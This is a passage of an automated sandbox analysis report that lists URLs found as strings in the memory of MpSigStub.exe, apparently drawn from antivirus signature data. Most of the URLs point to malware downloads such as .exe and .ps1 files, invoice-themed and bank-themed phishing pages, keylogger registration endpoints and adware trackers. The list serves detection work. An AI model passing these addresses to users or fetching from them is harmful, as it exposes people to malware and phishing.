Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://sneak.bananamikubanana.com/pc/page/set_reg.php?afrno=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://so1.5k5.net/interface?action=install&p=
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://soft.trustincash.com/url/config.xml
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://softthrifty.com/security.jsp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://sokyoss.drelshazly.com:8080/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://solk.seamscreative.info:8080/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://sommernph.com/og/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://sondervisual.com.ar/cnt.php?id=7314582
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://sonyxweb.ru
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://sprout17.blond.av4610.net/set_inf.php?id=movie_ef.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://spy-kill.com/bho_adult.txt
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=fkl&key=%s&v=%s
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://squash13.navy.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://srlvonf.info/youtube.xpi
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://srmvx.com.br/uploads/
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://srv166997.hoster-test.ru/decidedly/barrier/barbara/seem/phaytd.dot
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://srv87992.ht-test.ru/west/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://staging.stikbot.toys/24.gif
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://stankomeland.duckdns.org/js//share.php
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://starcorpinc.com?
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://start.abauit.com/logo.png?v7err
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://stat.02933.com
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://stat.openpart.ru/newtoolbar?p=qcash
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://stat.openpart.ru/newtoolbar?p=ziparchive
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://stat.t2t2.com/log/log1.asp?default&user=
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cn
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cnxv
Source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp String found in binary or memory: http://statapi.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://status.clrsch.com/loader/
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://strategosvideo4.com/1547.avi.exe
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://studiojagoda.pl/invoice-receipt/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://stumptowncreative.com/important-please-read/
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://sturfajtn.com
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://sucesores.com.mx/images/logo.gif
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://sundsvallsrk.nu/tmp/lns.txt
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://sunrypero.cf/document5.doc
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://superdoor.ch/media/jui/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://superfast.com.sapo.pt/fotos.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://superkahn.ru:8080/index.php
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://superpuperdomain.com/count.php?ref=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://sustainabletourismint.com/la)
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 00000023.00000003.18343980449.0000015B1ACD2000.00000004.00000001.sdmp String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: http://sys-doctor.com
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://systemfile.online
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://systemjhockogyn.com.br/boa.php
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://t.amy
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?js
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://t.cn
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://t.co/
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://t.me/decovid19bot
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://t.tr2q.com
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://taggsalimentos.com.br/pdf/login.htm
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://talk-of-the-tyne.co.uk/download
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://team.afcorp.afg/chr/crt-ho_30/newjflibrary
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://techwach.com
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponsex:
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/QuanLyGaraOtoDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/SampleProductsDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://tendancekart.com/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://tenillar.com/ko/pos.phpmethod=post
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://tescohomegroseryandelectronicstday2store.duckdns.org/office/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://tfu.ae/readme.txt
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://thankyou.orderreceipts.square7.ch/applica.exe
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/updates.doc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://thehairhive.ca/meg/retwesq.exe
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://thespecsupportservice.com/uno.dat
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://thevgjhknjkstore.com/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://thorsolberg.com?
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://tiasissi.com.br/revendedores/jquery/
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://tibia.pl/earth.php?x=
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://tibiahack.czweb.org/adduser.php?num=
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://tiny.cc/Tiktok-Pro
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/allinone-downloader
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/h7okabu)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/hop4az9)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/jfrwrhe)
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/jnvyzcl
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/jy69pnw)
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://tirb.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://tissueling.com
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://titiaredh.com/redirect/
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://titulospdf.ddns.net
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://tixwagoq.cn/in.cgi?14
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://tj.kpzip.com
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://tjuegost.info/downloads.html
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://tldrnet.top/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://today-friday.cn/maran/sejvan/get.php
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://toetallynailed.com?
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0xM
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://toolbarpartner.com
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://topiclab.com/wp-includes/css/index.php)
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://torscreen.org
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://track.wwwapps-ups.com/stats/xstats.php
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://traderspusers.hol.es/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://trail.filespm.com/dealdo/install-report
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18283369164.0000015B1BBD8000.00000004.00000001.sdmp String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://trik.ws/p.jpg
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://trik.ws/pc.exeg
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://try-anything-else.com/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://tsrv1.ws
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://tsrv4.ws/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://tu5amrmm.systotal.com/vnmsq40nj1q7a.php?30/receivetimeout30/connecttimeout/silent
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://tukangecuprus.com/cr_file_inst.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://tulip45.sepia.adulteroero.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://turtleone.zapto.org/out.rtf
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://twister.agropecuaria.ws/agro/twister.zip
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://twitck.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://twogreekgirls.com/wp-content/wellsfargo-online-update/com.htm)
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://u.to/PbrTEg
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://u.to/ardgdq)
